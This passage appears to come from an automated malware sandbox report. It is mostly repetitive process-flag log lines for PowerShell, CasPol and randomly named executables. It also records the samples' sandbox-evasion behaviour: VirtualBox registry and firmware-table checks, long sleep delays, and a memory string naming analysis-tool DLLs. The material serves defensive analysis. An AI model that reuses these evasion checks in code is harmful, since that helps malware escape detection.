Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSCD80.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD77.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: BXuFYgf6xs2uEKGHPQsSTe25.exe, 00000006.00000003.1658768599.0000000002290000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/AVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Users\user\Desktop\file.exe TID: 3592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5996	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1592	Thread sleep count: 3526 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1592	Thread sleep count: 3886 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597747s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597591s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597482s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597372s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597263s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -597027s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596811s >= -30000s	Jump to behavior
